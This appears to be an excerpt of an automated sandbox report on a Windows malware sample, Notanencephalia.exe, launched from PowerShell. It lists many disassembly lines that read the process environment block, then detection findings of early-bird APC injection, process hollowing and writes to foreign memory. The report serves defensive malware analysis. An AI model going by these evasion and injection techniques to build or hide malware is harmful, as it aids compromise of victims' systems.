      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F910 mov eax, dword ptr fs:[00000030h]14_2_1FD6F910
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F910 mov eax, dword ptr fs:[00000030h]14_2_1FD6F910
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F910 mov eax, dword ptr fs:[00000030h]14_2_1FD6F910
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F910 mov eax, dword ptr fs:[00000030h]14_2_1FD6F910
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F910 mov eax, dword ptr fs:[00000030h]14_2_1FD6F910
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F910 mov eax, dword ptr fs:[00000030h]14_2_1FD6F910
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F910 mov eax, dword ptr fs:[00000030h]14_2_1FD6F910
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F910 mov eax, dword ptr fs:[00000030h]14_2_1FD6F910
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F910 mov eax, dword ptr fs:[00000030h]14_2_1FD6F910
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F910 mov eax, dword ptr fs:[00000030h]14_2_1FD6F910
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F910 mov eax, dword ptr fs:[00000030h]14_2_1FD6F910
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE25930 mov eax, dword ptr fs:[00000030h]14_2_1FE25930
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE25930 mov ecx, dword ptr fs:[00000030h]14_2_1FE25930
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD67931 mov eax, dword ptr fs:[00000030h]14_2_1FD67931
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE15910 mov eax, dword ptr fs:[00000030h]14_2_1FE15910
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE15910 mov eax, dword ptr fs:[00000030h]14_2_1FE15910
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE15910 mov eax, dword ptr fs:[00000030h]14_2_1FE15910
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE15910 mov eax, dword ptr fs:[00000030h]14_2_1FE15910
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE15910 mov eax, dword ptr fs:[00000030h]14_2_1FE15910
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE15910 mov eax, dword ptr fs:[00000030h]14_2_1FE15910
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE15910 mov eax, dword ptr fs:[00000030h]14_2_1FE15910
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD778D9 mov eax, dword ptr fs:[00000030h]14_2_1FD778D9
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD778D9 mov eax, dword ptr fs:[00000030h]14_2_1FD778D9
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD738C4 mov eax, dword ptr fs:[00000030h]14_2_1FD738C4
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD738C4 mov eax, dword ptr fs:[00000030h]14_2_1FD738C4
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD738C4 mov eax, dword ptr fs:[00000030h]14_2_1FD738C4
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD738C4 mov eax, dword ptr fs:[00000030h]14_2_1FD738C4
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD738C4 mov eax, dword ptr fs:[00000030h]14_2_1FD738C4
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD738C4 mov eax, dword ptr fs:[00000030h]14_2_1FD738C4
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD738C4 mov eax, dword ptr fs:[00000030h]14_2_1FD738C4
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2F8F8 mov eax, dword ptr fs:[00000030h]14_2_1FE2F8F8
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD838E0 mov eax, dword ptr fs:[00000030h]14_2_1FD838E0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD838E0 mov eax, dword ptr fs:[00000030h]14_2_1FD838E0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD838E0 mov eax, dword ptr fs:[00000030h]14_2_1FD838E0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDF98E7 mov eax, dword ptr fs:[00000030h]14_2_1FDF98E7
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2D8B0 mov eax, dword ptr fs:[00000030h]14_2_1FE2D8B0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2D8B0 mov eax, dword ptr fs:[00000030h]14_2_1FE2D8B0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2F889 mov eax, dword ptr fs:[00000030h]14_2_1FE2F889
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE0B890 mov eax, dword ptr fs:[00000030h]14_2_1FE0B890
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE0B890 mov eax, dword ptr fs:[00000030h]14_2_1FE0B890
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB1843 mov eax, dword ptr fs:[00000030h]14_2_1FDB1843
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB1843 mov eax, dword ptr fs:[00000030h]14_2_1FDB1843
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB1843 mov eax, dword ptr fs:[00000030h]14_2_1FDB1843
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB1843 mov eax, dword ptr fs:[00000030h]14_2_1FDB1843
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB1843 mov eax, dword ptr fs:[00000030h]14_2_1FDB1843
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB1843 mov eax, dword ptr fs:[00000030h]14_2_1FDB1843
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA1876 mov eax, dword ptr fs:[00000030h]14_2_1FDA1876
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA1876 mov eax, dword ptr fs:[00000030h]14_2_1FDA1876
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6D878 mov eax, dword ptr fs:[00000030h]14_2_1FD6D878
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6D860 mov eax, dword ptr fs:[00000030h]14_2_1FD6D860
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD99803 mov eax, dword ptr fs:[00000030h]14_2_1FD99803
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE11800 mov eax, dword ptr fs:[00000030h]14_2_1FE11800
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE11800 mov eax, dword ptr fs:[00000030h]14_2_1FE11800
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2F80A mov eax, dword ptr fs:[00000030h]14_2_1FE2F80A
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA182A mov eax, dword ptr fs:[00000030h]14_2_1FDA182A
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA3820 mov eax, dword ptr fs:[00000030h]14_2_1FDA3820
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFD820 mov ecx, dword ptr fs:[00000030h]14_2_1FDFD820
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFD820 mov eax, dword ptr fs:[00000030h]14_2_1FDFD820
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFD820 mov eax, dword ptr fs:[00000030h]14_2_1FDFD820
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD757C0 mov eax, dword ptr fs:[00000030h]14_2_1FD757C0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD757C0 mov eax, dword ptr fs:[00000030h]14_2_1FD757C0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD757C0 mov eax, dword ptr fs:[00000030h]14_2_1FD757C0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7D7E0 mov ecx, dword ptr fs:[00000030h]14_2_1FD7D7E0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE437B6 mov eax, dword ptr fs:[00000030h]14_2_1FE437B6
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2D7B0 mov eax, dword ptr fs:[00000030h]14_2_1FE2D7B0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2D7B0 mov eax, dword ptr fs:[00000030h]14_2_1FE2D7B0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2F78A mov eax, dword ptr fs:[00000030h]14_2_1FE2F78A
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9D7B0 mov eax, dword ptr fs:[00000030h]14_2_1FD9D7B0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F7BA mov eax, dword ptr fs:[00000030h]14_2_1FD6F7BA
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F7BA mov eax, dword ptr fs:[00000030h]14_2_1FD6F7BA
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F7BA mov eax, dword ptr fs:[00000030h]14_2_1FD6F7BA
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F7BA mov eax, dword ptr fs:[00000030h]14_2_1FD6F7BA
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F7BA mov eax, dword ptr fs:[00000030h]14_2_1FD6F7BA
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F7BA mov eax, dword ptr fs:[00000030h]14_2_1FD6F7BA
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F7BA mov eax, dword ptr fs:[00000030h]14_2_1FD6F7BA
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F7BA mov eax, dword ptr fs:[00000030h]14_2_1FD6F7BA
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F7BA mov eax, dword ptr fs:[00000030h]14_2_1FD6F7BA
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFF7AF mov eax, dword ptr fs:[00000030h]14_2_1FDFF7AF
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFF7AF mov eax, dword ptr fs:[00000030h]14_2_1FDFF7AF
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFF7AF mov eax, dword ptr fs:[00000030h]14_2_1FDFF7AF
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFF7AF mov eax, dword ptr fs:[00000030h]14_2_1FDFF7AF
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFF7AF mov eax, dword ptr fs:[00000030h]14_2_1FDFF7AF
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDF97A9 mov eax, dword ptr fs:[00000030h]14_2_1FDF97A9
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83740 mov eax, dword ptr fs:[00000030h]14_2_1FD83740
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83740 mov eax, dword ptr fs:[00000030h]14_2_1FD83740
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD83740 mov eax, dword ptr fs:[00000030h]14_2_1FD83740
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE43749 mov eax, dword ptr fs:[00000030h]14_2_1FE43749
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6B765 mov eax, dword ptr fs:[00000030h]14_2_1FD6B765
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6B765 mov eax, dword ptr fs:[00000030h]14_2_1FD6B765
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6B765 mov eax, dword ptr fs:[00000030h]14_2_1FD6B765
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6B765 mov eax, dword ptr fs:[00000030h]14_2_1FD6B765
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1375F mov eax, dword ptr fs:[00000030h]14_2_1FE1375F
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1375F mov eax, dword ptr fs:[00000030h]14_2_1FE1375F
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1375F mov eax, dword ptr fs:[00000030h]14_2_1FE1375F
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1375F mov eax, dword ptr fs:[00000030h]14_2_1FE1375F
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1375F mov eax, dword ptr fs:[00000030h]14_2_1FE1375F
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDAF71F mov eax, dword ptr fs:[00000030h]14_2_1FDAF71F
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDAF71F mov eax, dword ptr fs:[00000030h]14_2_1FDAF71F
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3972B mov eax, dword ptr fs:[00000030h]14_2_1FE3972B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2F72E mov eax, dword ptr fs:[00000030h]14_2_1FE2F72E
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD77703 mov eax, dword ptr fs:[00000030h]14_2_1FD77703
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD75702 mov eax, dword ptr fs:[00000030h]14_2_1FD75702
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD75702 mov eax, dword ptr fs:[00000030h]14_2_1FD75702
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE4B73C mov eax, dword ptr fs:[00000030h]14_2_1FE4B73C
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE4B73C mov eax, dword ptr fs:[00000030h]14_2_1FE4B73C
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE4B73C mov eax, dword ptr fs:[00000030h]14_2_1FE4B73C
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE4B73C mov eax, dword ptr fs:[00000030h]14_2_1FE4B73C
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD69730 mov eax, dword ptr fs:[00000030h]14_2_1FD69730
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD69730 mov eax, dword ptr fs:[00000030h]14_2_1FD69730
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7973A mov eax, dword ptr fs:[00000030h]14_2_1FD7973A
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7973A mov eax, dword ptr fs:[00000030h]14_2_1FD7973A
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA5734 mov eax, dword ptr fs:[00000030h]14_2_1FDA5734
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD73720 mov eax, dword ptr fs:[00000030h]14_2_1FD73720
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD8F720 mov eax, dword ptr fs:[00000030h]14_2_1FD8F720
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD8F720 mov eax, dword ptr fs:[00000030h]14_2_1FD8F720
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD8F720 mov eax, dword ptr fs:[00000030h]14_2_1FD8F720
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE036EE mov eax, dword ptr fs:[00000030h]14_2_1FE036EE
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE036EE mov eax, dword ptr fs:[00000030h]14_2_1FE036EE
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE036EE mov eax, dword ptr fs:[00000030h]14_2_1FE036EE
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE036EE mov eax, dword ptr fs:[00000030h]14_2_1FE036EE
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE036EE mov eax, dword ptr fs:[00000030h]14_2_1FE036EE
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE036EE mov eax, dword ptr fs:[00000030h]14_2_1FE036EE
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2D6F0 mov eax, dword ptr fs:[00000030h]14_2_1FE2D6F0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA16CF mov eax, dword ptr fs:[00000030h]14_2_1FDA16CF
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7B6C0 mov eax, dword ptr fs:[00000030h]14_2_1FD7B6C0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7B6C0 mov eax, dword ptr fs:[00000030h]14_2_1FD7B6C0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Early bird code injection technique detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeJump to behavior
      Sample uses process hollowing technique
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Users\user\AppData\Local\Temp\Notanencephalia.exe base address: 400000Jump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Notanencephalia.exe base: 1660000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Notanencephalia.exe "C:\Users\user\AppData\Local\Temp\Notanencephalia.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
